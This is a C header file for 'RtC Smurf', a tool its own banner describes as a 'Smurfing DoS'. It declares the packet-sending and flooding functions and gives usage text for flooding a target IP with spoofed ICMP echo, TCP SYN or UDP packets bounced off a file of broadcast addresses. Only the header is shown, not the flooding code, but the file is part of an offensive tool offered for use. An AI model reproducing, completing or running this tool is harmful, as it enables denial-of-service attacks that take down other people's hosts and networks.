/****************************************************************************** * rtcsmurf.h by S/ash (member of RtC) * * contain function prototypes for the tool RtC Smurf * * RtC : http://www.rtc.fr.st -- email : rtc@fr.st * * RtC Tech : http://www.rtctech.fr.st * * S/ash : sl4sh@ifrance.com * ******************************************************************************/ #ifndef __RTCSMURF_H__ #define __RTCSMURF_H__ /*#define DEBUGGING*/ #include "ipraw.h" /* constants */ #define DEFDELAY 100 #define DEFDELAY_STR "100" #define DEFPACKETNB 1 #define DEFPACKETNB_STR "1" #define DEFPACKSIZE 256 #define DEFPACKSIZE_STR "256" /* error strings */ #define IPHDRWRITE_ERROR "error : couldn't write ip header.\n" #define CANTOPENFILE_ERROR "Cannot open file %s.\n" #define CANTRESOLVE_ERROR "Cannot resolve %s.\n" #define MEMORY_ERROR "error : not enough memory\n" /* interface strings */ #define RESOLVINGTARG_STR "Resolving target name...\n" #define TARGETIP_STR "Target is %s (%s)\n" #define RESOLVINGBCL_STR "Resolving broadcast list...\n" #define ADDED_STR "Added " #define BROADCASTIP_STR "\t%s\t(%s); \n" #define START_STR "\nFlooding..." #define PACKETNB_STR "\n%d..." #define END_STR "done.\n" #define VERSTR "/------------------------------------------------------------------------------\\\n"\ "| RtC Smurf |\n"\ "| Created by Sly and S/ash (members of RtC) |\n"\ "| Smurfing DoS |\n"\ "| This is a tool of RtC Tech |\n"\ "| RtC : http://www.rtc.fr.st -- email : rtc@fr.st |\n"\ "| RtC Tech : http://www.rtctech.fr.st |\n"\ "| Sly : rtcsly@yahoo.fr |\n"\ "| S/ash : sl4sh@ifrance.com |\n"\ "\\------------------------------------------------------------------------------/\n" #define SYNTAXSTR "syntax : rtcsmurf method destip {[-p pcksize] | destport fromport} bcfile\n"\ " [packetnb [delay]]\n"\ " method 0 : ICMP Echo Request 1 : SYN TCP Packet 2 : UDP packet\n"\ " destip : ip of host to smurf\n"\ " -p pcksize : size of packet for methods 0 (default " DEFPACKSIZE_STR ")\n"\ " destport : port to flood for methods 1-2\n"\ " fromport : port to use for flood (of broadcast ip) for methods 1-2\n"\ " bcfile : file containing the ip list to use for broadcast\n"\ " paquetnb : number of packets to send (default " DEFPACKETNB_STR ")\n"\ " delay : delay between two sending in ms (default " DEFDELAY_STR ")\n" /* * File rtcsmurf.c */ void send_packet(int, struct sockaddr_in, struct sockaddr_in, int, long, long); void smurf(struct sockaddr_in, struct sockaddr_in*, int, long, long, int); void argument(); int main(int, char**); #endif